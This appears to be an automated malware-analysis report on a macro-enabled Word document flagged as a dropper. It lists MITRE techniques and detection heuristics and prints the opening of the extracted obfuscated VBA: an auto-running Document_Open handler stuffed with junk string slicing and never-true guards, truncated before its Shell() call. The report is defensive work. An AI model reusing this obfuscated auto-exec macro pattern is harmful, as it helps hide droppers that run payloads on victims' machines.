MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The document carries VBA macros, including a Document_Open handler that runs automatically once macros are enabled and calls Shell() to launch an external process. Auto-execution combined with a shell call is the classic shape of a macro dropper that fetches and runs a second-stage payload. The visible source is padded with string slices and If Len() guards on short literals that can never be true, and the preview is cut off before the Shell() call, so the launched command has to be recovered by folding the string operations rather than read directly. The ClamAV signature Doc.Dropper.Agent-6344763-0 independently classifies the file as a dropper.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6344763-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6344763-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): the macro invokes Shell(), which starts an external program from the Office process.
- Document_Open macro (high, OLE_VBA_DOCOPEN): a Document_Open handler is present; it runs without further user interaction as soon as the document is opened with macros enabled.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable. In this sample the source was also recovered (see extracted artifacts), so the p-code finding corroborates the source-level ones rather than replacing them.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI that Office writes into any document containing drawing markup, not a download or C2 address, and should not be promoted to a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 82922 bytes |

SHA-256: 6c03227413725a4333f3292ac08e4cc8ddbef27624e27300abe82bdfa2e9596d

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
L64JVi83 = "V6upEIBH"
L64JVi83 = LTrim(Mid(L64JVi83, -1643 + 1654, -1643 + 1654))
JCVAJY6 = "poGiJOL"
If Len(JCVAJY6) > 156 Then
sBpku = "jKg4A"
MsgBox sBpku, 63, "RhfdS"
End If
Tf2sFa = "oI1RV"
If Len(Tf2sFa) > 156 Then
YaxTIDuhl = "pOUc9KF6"
MsgBox YaxTIDuhl, 63, "vLj4B8ncS"
End If
Vpr83DbwT = "jQ6xpZhuk"
Vpr83DbwT = Trim(Mid(Vpr83DbwT, -1632 + 1642, -1632 + 1642))
MnSQNCVu = "WTgQwOuB"
If Len(MnSQNCVu) > 173 Then
B8zWQovN = "AxIwLKA"
MsgBox B8zWQovN, 58, "foCES"
End If
Rktq5O76 = "YV5ty"
Rktq5O76 = LTrim(Mid(Rktq5O76, -1632 + 1642, -1632 + 1642))
lNYMIF = "51GJo"
ad5b0gu4V = "UGbpZ"
AeYlxs3P = "gQsDb"
AeYlxs3P = Trim(Mid(AeYlxs3P, -2717 + 2727, -2717 + 2727))
D3JbZ = "IpwsUM"
D3JbZ = RTrim(Mid(D3JbZ, -2717 + 2727, -2717 + 2727))
RER5ueVlv = "eXqh3M9d1"
RER5ueVlv = Trim(Mid(RER5ueVlv, -2309 + 2314, -2309 + 2314))
xEC2uS1I = "Qoh8pfId"
xEC2uS1I = Trim(Mid(xEC2uS1I, -2309 + 2314, -2309 + 2314))
ZQJzKTt = "walb0"
ZQJzKTt = RTrim(Mid(ZQJzKTt, -2309 + 2314, -2309 + 2314))
Dim IlyCB53D
IlyCB53D = lNYMIF & ad5b0gu4V
LMjk1emG = "hp2Ls5m"
I30q9nyT = "Lhh"
qMtb9ay = "Pl3rsYVP"
qMtb9ay = Trim(Mid(qMtb9ay, -1635 + 1641, -1635 + 1641))
Slt913j = "QcuqCw1Z"
If Len(Slt913j) > 233 Then
dW2lLg = "Irbsayk"
MsgBox dW2lLg, 62, "R2mYUKkE"
End If
NhJGz = "nkyeZfI"
NhJGz = Trim(Mid(NhJGz, -1635 + 1641, -1635 + 1641))
YAC8N4q6T = "p3SIN"
YAC8N4q6T = RTrim(Mid(YAC8N4q6T, 26493 - 26492, 26493 - 26492))
ivmElgqnR = "u2N3PKs7C"
ivmElgqnR = LTrim(Mid(ivmElgqnR, 26493 - 26492, 26493 - 26492))
sLjoD = "dq9wR2"
If Len(sLjoD) > 175 Then
ahRHlB = "nAtCZl4"
MsgBox ahRHlB, 62, "r9DYZ"
End If
I2LpPClf = "QoWqY"
I2LpPClf = RTrim(Mid(I2LpPClf, 13656 / 13656, 13656 / 13656))
Dim yeE0j9ug
yeE0j9ug = LMjk1emG & I30q9nyT
ylteANh = "WYlJ3bmtz"
fOL8mS6kp = "J"
ZtfqP = "aowxIJ"
If Len(ZtfqP) > 254 Then
GthXxTJ6 = "X7pHLZBvt"
MsgBox GthXxTJ6, 27, "oMITo8"
End If
b7XVPJ5Hp = "v5OPxyd"
If Len(b7XVPJ5Hp) > 254 Then
pfgauje = "EvlnmoHzK"
MsgBox pfgauje, 27, "SjuwbdI"
End If
eogyB = "w9trPNVM"
eogyB = LTrim(Mid(eogyB, -5058 + 5061, -5058 + 5061))
WHsW7m = "IGOsM"
WHsW7m = LTrim(Mid(WHsW7m, -5058 + 5061, -5058 + 5061))
C0WU1OCaT = "IGw5Be"
If Len(C0WU1OCaT) > 176 Then
KL0BM = "zeHE7Q"
MsgBox KL0BM, 24, "Y4Mhkmq"
End If
CcNowsvL = "R09P2k"
CcNowsvL = Trim(Mid(CcNowsvL, -5058 + 5061, -5058 + 5061))
Dim V64u1
V64u1 = ylteANh & fOL8mS6kp
qNlYWB = "yVXetRCKo"
i81Di3Qm = Chr(78)
RIWi4NKR = "MVx7KjZh0"
If Len(RIWi4NKR) > 161 Then
E5oLT79mn = "OdIjXqx"
MsgBox E5oLT79mn, 53, "CeT3Qvy"
End If
glb7RzX = "LANut"
glb7RzX = Trim(Mid(glb7RzX, 2693 - 2681, 2693 - 2681))
PWLKXzeh8 = "czqV0"
If Len(PWLKXzeh8) > 230 Then
mcue3M17 = "jDke5gi"
MsgBox mcue3M17, 3, "L2MFKa5E"
End If
ENgym = "aDH4e"
ENgym = LTrim(Mid(ENgym, 1547 - 1531, 1547 - 1531))
yJYkbjRS = "NvuL5HsZ"
yJYkbjRS = RTrim(Mid(yJYkbjRS, 1547 - 1531, 1547 - 1531))
Dim TPtm3fla
TPtm3fla = qNlYWB & i81Di3Qm
y13H7ys = "E5"
mnPNIXU = "CduVWas"
xN5Vu = "N"
eO0lu = "El0kv"
If Len(eO0lu) > 151 Then
Wd98Agi0G = "f4iYPD1"
MsgBox Wd98Agi0G, 13, "DYs79dfCE"
End If
wDL2KXTI = "OQxjNof"
wDL2KXTI = Trim(Mid(wDL2KXTI, 26377 / 2029, 26377 / 2029))
zSAMVQlB = "fgSfZ0W1a"
If Len(zSAMVQlB) > 212 Then
BsIUZlJ = "xbs48xzG"
MsgBox BsIUZlJ, 52, "uqzdvaEly"
End If
oHP9NBYa = "n5fidZ3Ol"
If Len(oHP9NBYa) > 212 Then
EBAjVC = "otolGgH4r"
MsgBox EBAjVC, 52, "q9FaUj"
End If
CvWwxQ = "jWDwn7ut0"
CvWwxQ = LTrim(Mid(CvWwxQ, 8996 / 692, 8996 / 692))
WpEJf = "KiPCV4Koz"
WpEJf = RTrim(Mid(WpEJf, 8996 / 692, 8996 / 692))
zz3tDlVh9 = "j2fpjX"
zz3tDlVh9 = RTrim(Mid(zz3tDlVh9, 8996 / 692, 8996 / 692))
TEY6wi = "TJQ6lYVbZ"
TEY6wi = RTrim(Mid(TEY6wi, 24714 / 8238, 24714 / 8238))
x4Vv2 = "NFXW6u"
x4Vv2 = LTrim(Mid(x4Vv2, 24714 / 8238, 247 ... (truncated)
```